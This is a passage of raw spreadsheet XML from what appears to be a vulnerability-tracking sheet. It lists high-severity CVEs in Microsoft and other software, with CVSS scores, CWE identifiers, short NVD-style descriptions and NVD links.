t="inlineStr"><is><t>CVE-2026-47297</t></is></c><c r="D651" s="5" t="n"><v>8.1</v></c><c r="E651" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F651" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G651" s="5" t="inlineStr" /><c r="H651" s="5" t="n"><v>0.008</v></c><c r="I651" s="5" t="inlineStr" /><c r="J651" s="5" t="inlineStr" /><c r="K651" s="5" t="inlineStr" /><c r="L651" s="5" t="inlineStr" /><c r="M651" s="5" t="inlineStr" /><c r="N651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P651" s="5" t="inlineStr" /><c r="Q651" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R651" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t></is></c></row><row r="652"><c r="A652" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B652" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C652" s="5" t="inlineStr"><is><t>CVE-2026-54330</t></is></c><c r="D652" s="5" t="n"><v>8.1</v></c><c r="E652" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F652" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G652" s="5" t="inlineStr" /><c r="H652" s="5" t="n"><v>0.002</v></c><c r="I652" s="5" t="inlineStr" /><c r="J652" s="5" t="inlineStr" /><c r="K652" s="5" t="inlineStr" /><c r="L652" s="5" t="inlineStr" /><c r="M652" s="5" t="inlineStr" /><c r="N652" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O652" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P652" s="5" t="inlineStr" /><c r="Q652" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R652" s="5" t="inlineStr"><is><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is></c><c r="S652" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54330</t></is></c></row><row r="653"><c r="A653" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C653" s="5" t="inlineStr"><is><t>CVE-2026-55007</t></is></c><c r="D653" s="5" t="n"><v>8.1</v></c><c r="E653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F653" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G653" s="5" t="inlineStr" /><c r="H653" s="5" t="n"><v>0.007</v></c><c r="I653" s="5" t="inlineStr" /><c r="J653" s="5" t="inlineStr" /><c r="K653" s="5" t="inlineStr" /><c r="L653" s="5" t="inlineStr" /><c r="M653" s="5" t="inlineStr" /><c r="N653" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P653" s="5" t="inlineStr" /><c r="Q653" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R653" s="5" t="inlineStr"><is><t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S653" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t></is></c></row><row r="654"><c r="A654" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B654" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C654" s="5" t="inlineStr"><is><t>CVE-2026-61641</t></is></c><c r="D654" s="5" t="n"><v>8.1</v></c><c r="E654" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F654" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G654" s="5" t="inlineStr" /><c r="H654" s="5" t="n"><v>0.003</v></c><c r="I654" s="5" t="inlineStr" /><c r="J654" s="5" t="inlineStr" /><c r="K654" s="5" t="inlineStr" /><c r="L654" s="5" t="inlineStr" /><c r="M654" s="5" t="inlineStr" /><c r="N654" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O654" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P654" s="5" t="inlineStr" /><c r="Q654" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R654" s="5" t="inlineStr"><is><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is></c><c r="S654" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61641</t></is></c></row><row r="655"><c r="A655" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B655" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C655" s="5" t="inlineStr"><is><t>CVE-2026-61699</t></is></c><c r="D655" s="5" t="n"><v>8.1</v></c><c r="E655" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F655" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G655" s="5" t="inlineStr" /><c r="H655" s="5" t="n"><v>0.002</v></c><c r="I655" s="5" t="inlineStr" /><c r="J655" s="5" t="inlineStr" /><c r="K655" s="5" t="inlineStr" /><c r="L655" s="5" t="inlineStr" /><c r="M655" s="5" t="inlineStr" /><c r="N655" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O655" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P655" s="5" t="inlineStr" /><c r="Q655" s="5" t="inlineStr"><is><t>CWE-299, CWE-672</t></is></c><c r="R655" s="5" t="inlineStr"><is><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is></c><c r="S655" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61699</t></is></c></row><row r="656"><c r="A656" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C656" s="5" t="inlineStr"><is><t>CVE-2026-69325</t></is></c><c r="D656" s="5" t="n"><v>8.1</v></c><c r="E656" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F656" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G656" s="5" t="inlineStr" /><c r="H656" s="5" t="n"><v>0.006</v></c><c r="I656" s="5" t="inlineStr" /><c r="J656" s="5" t="inlineStr" /><c r="K656" s="5" t="inlineStr" /><c r="L656" s="5" t="inlineStr" /><c r="M656" s="5" t="inlineStr" /><c r="N656" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P656" s="5" t="inlineStr" /><c r="Q656" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R656" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S656" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t></is></c></row><row r="657"><c r="A657" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C657" s="5" t="inlineStr"><is><t>CVE-2026-69380</t></is></c><c r="D657" s="5" t="n"><v>8.1</v></c><c r="E657" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F657" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G657" s="5" t="inlineStr" /><c r="H657" s="5" t="n"><v>0.007</v></c><c r="I657" s="5" t="inlineStr" /><c r="J657" s="5" t="inlineStr" /><c r="K657" s="5" t="inlineStr" /><c r="L657" s="5" t="inlineStr" /><c r="M657" s="5" t="inlineStr" /><c r="N657" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P657" s="5" t="inlineStr" /><c r="Q657" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R657" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S657" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t></is></c></row><row r="658"><c r="A658" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C658" s="5" t="inlineStr"><is><t>CVE-2026-69438</t></is></c><c r="D658" s="5" t="n"><v>8.1</v></c><c r="E658" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F658" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G658" s="5" t="inlineStr" /><c r="H658" s="5" t="n"><v>0.007</v></c><c r="I658" s="5" t="inlineStr" /><c r="J658" s="5" t="inlineStr" /><c r="K658" s="5" t="inlineStr" /><c r="L658" s="5" t="inlineStr" /><c r="M658" s="5" t="inlineStr" /><c r="N658" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P658" s="5" t="inlineStr" /><c r="Q658" s="5" t="inlineStr"><is><t>CWE-681</t></is></c><c r="R658" s="5" t="inlineStr"><is><t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S658" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t></is></c></row><row r="659"><c r="A659" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C659" s="5" t="inlineStr"><is><t>CVE-2026-69510</t></is></c><c r="D659" s="5" t="n"><v>8.1</v></c><c r="E659" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F659" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G659" s="5" t="inlineStr" /><c r="H659" s="5" t="n"><v>0.007</v></c><c r="I659" s="5" t="inlineStr" /><c r="J659" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K659" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L659" s="5" t="inlineStr" /><c r="M659" s="5" t="inlineStr" /><c r="N659" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P659" s="5" t="inlineStr" /><c r="Q659" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R659" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S659" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t></is></c></row><row r="660"><c r="A660" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C660" s="5" t="inlineStr"><is><t>CVE-2026-69524</t></is></c><c r="D660" s="5" t="n"><v>8.1</v></c><c r="E660" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F660" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G660" s="5" t="inlineStr" /><c r="H660" s="5" t="n"><v>0.007</v></c><c r="I660" s="5" t="inlineStr" /><c r="J660" s="5" t="inlineStr" /><c r="K660" s="5" t="inlineStr" /><c r="L660" s="5" t="inlineStr" /><c r="M660" s="5" t="inlineStr" /><c r="N660" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P660" s="5" t="inlineStr" /><c r="Q660" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R660" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S660" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t></is></c></row><row r="661"><c r="A661" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C661" s="5" t="inlineStr"><is><t>CVE-2026-69530</t></is></c><c r="D661" s="5" t="n"><v>8.1</v></c><c r="E661" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F661" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G661" s="5" t="inlineStr" /><c r="H661" s="5" t="n"><v>0.006</v></c><c r="I661" s="5" t="inlineStr" /><c r="J661" s="5" t="inlineStr" /><c r="K661" s="5" t="inlineStr" /><c r="L661" s="5" t="inlineStr" /><c r="M661" s="5" t="inlineStr" /><c r="N661" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P661" s="5" t="inlineStr" /><c r="Q661" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R661" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S661" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t></is></c></row><row r="662"><c r="A662" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C662" s="5" t="inlineStr"><is><t>CVE-2026-69546</t></is></c><c r="D662" s="5" t="n"><v>8.1</v></c><c r="E662" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F662" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G662" s="5" t="inlineStr" /><c r="H662" s="5" t="n"><v>0.007</v></c><c r="I662" s="5" t="inlineStr" /><c r="J662" s="5" t="inlineStr" /><c r="K662" s="5" t="inlineStr" /><c r="L662" s="5" t="inlineStr" /><c r="M662" s="5" t="inlineStr" /><c r="N662" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P662" s="5" t="inlineStr" /><c r="Q662" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R662" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S662" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t></is></c></row><row r="663"><c r="A663" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C663" s="5" t="inlineStr"><is><t>CVE-2026-69620</t></is></c><c r="D663" s="5" t="n"><v>8.1</v></c><c r="E663" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F663" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G663" s="5" t="inlineStr" /><c r="H663" s="5" t="n"><v>0.007</v></c><c r="I663" s="5" t="inlineStr" /><c r="J663" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K663" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L663" s="5" t="inlineStr" /><c r="M663" s="5" t="inlineStr" /><c r="N663" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P663" s="5" t="inlineStr" /><c r="Q663" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R663" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S663" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t></is></c></row><row r="664"><c r="A664" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C664" s="5" t="inlineStr"><is><t>CVE-2026-69680</t></is></c><c r="D664" s="5" t="n"><v>8.1</v></c><c r="E664" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F664" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G664" s="5" t="inlineStr" /><c r="H664" s="5" t="n"><v>0.003</v></c><c r="I664" s="5" t="inlineStr" /><c r="J664" s="5" t="inlineStr" /><c r="K664" s="5" t="inlineStr" /><c r="L664" s="5" t="inlineStr" /><c r="M664" s="5" t="inlineStr" /><c r="N664" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P664" s="5" t="inlineStr" /><c r="Q664" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="R664" s="5" t="inlineStr"><is><t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="S664" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t></is></c></row><row r="665"><c r="A665" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C665" s="5" t="inlineStr"><is><t>CVE-2026-69732</t></is></c><c r="D665" s="5" t="n"><v>8.1</v></c><c r="E665" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F665" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G665" s="5" t="inlineStr" /><c r="H665" s="5" t="n"><v>0.007</v></c><c r="I665" s="5" t="inlineStr" /><c r="J665" s="5" t="inlineStr" /><c r="K665" s="5" t="inlineStr" /><c r="L665" s="5" t="inlineStr" /><c r="M665" s="5" t="inlineStr" /><c r="N665" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P665" s="5" t="inlineStr" /><c r="Q665" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R665" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S665" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t></is></c></row><row r="666"><c r="A666" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C666" s="5" t="inlineStr"><is><t>CVE-2026-69782</t></is></c><c r="D666" s="5" t="n"><v>8.1</v></c><c r="E666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F666" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G666" s="5" t="inlineStr" /><c r="H666" s="5" t="n"><v>0.006</v></c><c r="I666" s="5" t="inlineStr" /><c r="J666" s="5" t="inlineStr" /><c r="K666" s="5" t="inlineStr" /><c r="L666" s="5" t="inlineStr" /><c r="M666" s="5" t="inlineStr" /><c r="N666" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P666" s="5" t="inlineStr" /><c r="Q666" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R666" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S666" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t></is></c></row><row r="667"><c r="A667" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C667" s="5" t="inlineStr"><is><t>CVE-2026-69786</t></is></c><c r="D667" s="5" t="n"><v>8.1</v></c><c r="E667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F667" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G667" s="5" t="inlineStr" /><c r="H667" s="5" t="n"><v>0.007</v></c><c r="I667" s="5" t="inlineStr" /><c r="J667" s="5" t="inlineStr" /><c r="K667" s="5" t="inlineStr" /><c r="L667" s="5" t="inlineStr" /><c r="M667" s="5" t="inlineStr" /><c r="N667" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P667" s="5" t="inlineStr" /><c r="Q667" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R667" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S667" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t></is></c></row><row r="668"><c r="A668" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C668" s="5" t="inlineStr"><is><t>CVE-2026-69813</t></is></c><c r="D668" s="5" t="n"><v>8.1</v></c><c r="E668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F668" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G668" s="5" t="inlineStr" /><c r="H668" s="5" t="n"><v>0.007</v></c><c r="I668" s="5" t="inlineStr" /><c r="J668" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K668" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L668" s="5" t="inlineStr" /><c r="M668" s="5" t="inlineStr" /><c r="N668" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P668" s="5" t="inlineStr" /><c r="Q668" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R668" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S668" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t></is></c></row><row r="669"><c r="A669" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C669" s="5" t="inlineStr"><is><t>CVE-2026-69827</t></is></c><c r="D669" s="5" t="n"><v>8.1</v></c><c r="E669" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F669" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G669" s="5" t="inlineStr" /><c r="H669" s="5" t="n"><v>0.005</v></c><c r="I669" s="5" t="inlineStr" /><c r="J669" s="5" t="inlineStr" /><c r="K669" s="5" t="inlineStr" /><c r="L669" s="5" t="inlineStr" /><c r="M669" s="5" t="inlineStr" /><c r="N669" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P669" s="5" t="inlineStr" /><c r="Q669" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R669" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S669" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t></is></c></row><row r="670"><c r="A670" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C670" s="5" t="inlineStr"><is><t>CVE-2026-69858</t></is></c><c r="D670" s="5" t="n"><v>8.1</v></c><c r="E670" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F670" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G670" s="5" t="inlineStr" /><c r="H670" s="5" t="n"><v>0.007</v></c><c r="I670" s="5" t="inlineStr" /><c r="J670" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K670" s="5" t="inlineStr"><is><t>microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L670" s="5" t="inlineStr" /><c r="M670" s="5" t="inlineStr" /><c r="N670" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P670" s="5" t="inlineStr" /><c r="Q670" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R670" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S670" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t></is></c></row><row r="671"><c r="A671" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C671" s="5" t="inlineStr"><is><t>CVE-2026-69989</t></is></c><c r="D671" s="5" t="n"><v>8.1</v></c><c r="E671" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F671" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G671" s="5" t="inlineStr" /><c r="H671" s="5" t="n"><v>0.007</v></c><c r="I671" s="5" t="inlineStr" /><c r="J671" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K671" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L671" s="5" t="inlineStr" /><c r="M671" s="5" t="inlineStr" /><c r="N671" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P671" s="5" t="inlineStr" /><c r="Q671" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R671" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S671" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t></is></c></row><row r="672"><c r="A672" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C672" s="5" t="inlineStr"><is><t>CVE-2026-70342</t></is></c><c r="D672" s="5" t="n"><v>8.1</v></c><c r="E672" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F672" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G672" s="5" t="inlineStr" /><c r="H672" s="5" t="n"><v>0.008999999999999999</v></c><c r="I672" s="5" t="inlineStr" /><c r="J672" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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72" s="5" t="inlineStr" /><c r="M672" s="5" t="inlineStr" /><c r="N672" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P672" s="5" t="inlineStr" /><c r="Q672" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R672" s="5" t="inlineStr"><is><t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="S672" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t></is></c></row><row r="673"><c r="A673" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C673" s="5" t="inlineStr"><is><t>CVE-2026-70563</t></is></c><c r="D673" s="5" t="n"><v>8.1</v></c><c r="E673" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F673" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G673" s="5" t="inlineStr" /><c r="H673" s="5" t="n"><v>0.008999999999999999</v></c><c r="I673" s="5" t="inlineStr" /><c r="J673" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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73" s="5" t="inlineStr" /><c r="M673" s="5" t="inlineStr" /><c r="N673" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P673" s="5" t="inlineStr" /><c r="Q673" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R673" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="S673" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t></is></c></row><row r="674"><c r="A674" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B674" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C674" s="5" t="inlineStr"><is><t>CVE-2026-72001</t></is></c><c r="D674" s="5" t="n"><v>8.1</v></c><c r="E674" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F674" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G674" s="5" t="inlineStr" /><c r="H674" s="5" t="n"><v>0.003</v></c><c r="I674" s="5" t="inlineStr" /><c r="J674" s="5" t="inlineStr" /><c r="K674" s="5" t="inlineStr" /><c r="L674" s="5" t="inlineStr" /><c r="M674" s="5" t="inlineStr" /><c r="N674" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O674" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P674" s="5" t="inlineStr" /><c r="Q674" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R674" s="5" t="inlineStr"><is><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is></c><c r="S674" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72001</t></is></c></row><row r="675"><c r="A675" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C675" s="5" t="inlineStr"><is><t>CVE-2026-72936</t></is></c><c r="D675" 